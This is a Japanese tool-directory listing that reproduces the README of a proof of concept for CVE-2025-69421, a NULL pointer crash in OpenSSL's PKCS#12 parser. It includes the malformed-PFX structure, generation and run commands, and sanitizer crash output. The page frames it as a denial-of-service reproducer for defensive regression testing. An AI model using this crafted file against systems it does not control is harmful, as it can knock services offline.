Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
PoC-CVE-2025-69421 — CVE-2025-69421の最小再現プログラム。暗号化されたContentフィールドが存在しない不正なPFXファイルによる、OpenSSL PKCS#12処理におけるNULLポインタ参照を実証します。生成スクリプト、ASN.1検査、UBSanトリガークラッシュ出力を含み、防御的な回帰テストに使用できます。 | Kitploit
ツール/GitHubGitHub/kha-beleh/poc-cve-2025-69421
脆弱性分析エクスプロイトファジング暗号化バイナリ解析学習と教育
GitHubkha-beleh/poc-cve-2025-69421

PoC-CVE-2025-69421

CVE-2025-69421の最小再現プログラム。暗号化されたContentフィールドが存在しない不正なPFXファイルによる、OpenSSL PKCS#12処理におけるNULLポインタ参照を実証します。生成スクリプト、ASN.1検査、UBSanトリガークラッシュ出力を含み、防御的な回帰テストに使用できます。

リポジトリを見る
11ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-69421 クラッシュ専用再現器

このリポジトリには、隔離された実験環境で CVE-2025-69421 を再現する 最小限の不正な PKCS#12 ファイルが含まれています。

生成された PFX には、オプションの encryptedContent フィールドが省略された EncryptedContentInfo を持つ EncryptedData が含まれています。脆弱な OpenSSL バージョンでは、PKCS12_unpack_p7encdata() から PKCS12_item_decrypt_d2i_ex() に NULL の ASN1_OCTET_STRING ポインタが渡され、 NULL チェックなしで逆参照される可能性があります。

この再現器はサービス拒否状態のみを実証します。コード実行や情報漏えいは 行いません。

リポジトリの内容

root@kitploit:~
.
├── README.md
├── LICENSE
├── Makefile
├── generate.py
├── run.sh
├── malformed-cve-2025-69421.p12
└── evidence
    └── ubsan-output.txt

必要条件

  • Python 3
  • UBSan または ASan/UBSan でコンパイルされた脆弱な OpenSSL ビルド
  • 確認済みの再現には OpenSSL 3.0.7 を使用しました

PoC を実行する前にビルドディレクトリを設定します:

root@kitploit:~
export OPENSSL_BUILD=/path/to/openssl-build
export OPENSSL_BIN="$OPENSSL_BUILD/apps/openssl"

OPENSSL_BUILD には、脆弱な libcrypto.so.3 と、対応する apps/openssl バイナリが含まれている必要があります。

不正な PKCS#12 ファイルの生成

事前生成されたファイルが含まれています。再作成するには:

root@kitploit:~
python3 generate.py

出力は次のとおりです:

root@kitploit:~
malformed-cve-2025-69421.p12

ASN.1 構造の確認

root@kitploit:~
openssl asn1parse \
  -inform DER \
  -in malformed-cve-2025-69421.p12 \
  -i

関連する構造は次のとおりです:

root@kitploit:~
PFX
├── version = 3
└── authSafe: ContentInfo(data)
    └── OCTET STRING
        └── AuthenticatedSafe
            └── ContentInfo(encryptedData)
                └── EncryptedData
                    ├── version = 0
                    └── EncryptedContentInfo
                        ├── contentType = data
                        ├── algorithm = pbeWithSHA1And3-KeyTripleDES-CBC
                        └── encryptedContent = absent

再現器の実行

ヘルパースクリプトを使用する場合:

root@kitploit:~
export OPENSSL_BUILD=/path/to/openssl-build
./run.sh

同等の手動コマンド:

root@kitploit:~
export OPENSSL_BUILD=/path/to/openssl-build
export OPENSSL_BIN="$OPENSSL_BUILD/apps/openssl"

ASAN_OPTIONS='abort_on_error=1:halt_on_error=1:detect_leaks=0:symbolize=1' \
UBSAN_OPTIONS='halt_on_error=1:print_stacktrace=1' \
LD_LIBRARY_PATH="$OPENSSL_BUILD" \
"$OPENSSL_BIN" pkcs12 \
  -in malformed-cve-2025-69421.p12 \
  -info \
  -noout \
  -passin pass:test

脆弱なビルドでの期待される結果

root@kitploit:~
Warning: MAC is absent!
PKCS7 Encrypted data: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 1
crypto/pkcs12/p12_decr.c:140:66: runtime error: member access within null pointer of type 'const struct ASN1_OCTET_STRING'
    #0 0x... in PKCS12_item_decrypt_d2i_ex (/path/to/openssl-build/libcrypto.so.3+0x...)
    #1 0x... in PKCS12_unpack_p7encdata (/path/to/openssl-build/libcrypto.so.3+0x...)
    #2 0x... in dump_certs_keys_p12 (/path/to/openssl-build/apps/openssl+0x...)
    #3 0x... in pkcs12_main (/path/to/openssl-build/apps/openssl+0x...)

重要な指標は次のとおりです:

root@kitploit:~
member access within null pointer
PKCS12_item_decrypt_d2i_ex
PKCS12_unpack_p7encdata

修正済みビルドでの期待される結果

修正済みの OpenSSL ビルドは、サニタイザの検出やプロセスのクラッシュなしに、 不正な入力を拒否するはずです。エラーには次のものが含まれる場合があります:

root@kitploit:~
PKCS12_item_decrypt_d2i_ex:passed a null parameter

技術概要

root@kitploit:~
CVE: CVE-2025-69421
Component: OpenSSL PKCS#12 processing
Trigger: EncryptedData with absent encryptedContent
Fault: NULL pointer dereference
Function: PKCS12_item_decrypt_d2i_ex()
Reachable through: PKCS12_unpack_p7encdata()
Impact: Denial of Service

免責事項

この再現器は、所有しているシステム、またはテストを明示的に許可された システムでのみ使用してください。同梱の成果物は、防御的な検証と リグレッションテストを目的としています。

ツールをダウンロード